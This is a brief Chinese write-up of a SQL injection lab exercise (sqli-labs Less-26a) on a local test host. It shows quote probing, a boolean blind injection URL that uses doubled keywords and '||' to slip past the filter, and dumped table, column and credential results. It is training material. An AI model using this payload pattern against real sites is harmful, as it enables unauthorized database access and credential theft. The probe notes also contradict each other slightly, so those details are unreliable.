http://10.0.2.15/sqli/Less-26a/?id=1
显示用户名和密码
http://10.0.2.15/sqli/Less-26a/?id=1‘
不显示用户名和密码
http://10.0.2.15/sqli/Less-26a/?id=1"
显示用户名和密码

猜测sql：
select 字段名 from 表名 where id = '输入的id';

验证：
http://10.0.2.15/sqli/Less-26a/?id=1'
显示用户名和密码，从而印证推测的正确性
由于不会有报错显示，并且登录成功和失败的页面不一样，故可以采用基于布尔值的盲注
如：
http://10.0.2.15/sqli/Less-26a/?id=1'aandnd(mid((select(database())),1,1)='a')||'1'='2
就会显示用户名和密码

编写脚本

1.数据库名
result:security

2.表名
result:users,uagents,emails,referers

3.字段名
result:id,username,password,user,current_connections,total_connections

4.字段值
result:dumb:1,angelina:1,dummy:1,secure:1,stupid:1,superman:1,batman:1,admin:123,admin1:1,admin2:1,admin3:1,dhakkan:1,admin4:1
